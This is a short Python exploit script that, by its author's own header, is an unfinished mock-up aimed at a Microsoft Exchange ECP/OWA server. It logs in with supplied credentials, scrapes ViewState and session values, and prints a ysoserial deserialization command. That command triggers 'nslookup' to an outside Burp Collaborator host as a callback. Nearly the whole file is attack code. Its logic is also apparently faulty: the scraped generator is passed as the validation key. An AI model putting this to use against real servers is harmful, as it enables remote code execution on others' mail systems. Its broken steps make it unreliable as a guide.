exploit.py

#
# THIS WILL NOT WORK IT NEEDS WORK
#
#
# This is a mock up of a exploit flow i need a system i can test on this to make it work but here is the base code to get some where
#
# By Random_Robbie 
#
#
import requests
import argparse
import re

parser = argparse.ArgumentParser()
parser.add_argument("-s", "--server", required=True, help="ECP Server")
parser.add_argument("-u", "--user", required=True, help="Email Address")
parser.add_argument("-p", "--password", required=True, help="Password")

args = parser.parse_args()


owa_login_form_url = args.server

user_name = args.user
pwd = args.password




session = requests.Session()

paramsPost = {"password":""+pwd+"","isUtf8":"1","passwordText":"","trusted":"4","destination":""+owa_login_form_url+"","flags":"4","forcedownlevel":"0","username":""+user_name+""}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"PBack":"0","PrivateComputer":"true"}
response = session.post(""+owa_login_form_url+"auth.owa", data=paramsPost, headers=headers, cookies=cookies)

print("Status code:   %i" % response.status_code)
if "reason=2" in response.text:
	print ("Login Incorrect")
else:
	VIEWSTATEGENERATOR = re.compile('id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(response.text))[0]
	viewstateuserkey = re.compile('ASP.NET_SessionId=(.+?) Time').findall(str(response.headers))[0]
	print("""ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="""+VIEWSTATEGENERATOR+""" --generator="B97B4E27" --viewstateuserkey="""+viewstateuserkey+""" --isdebug –islegacy""")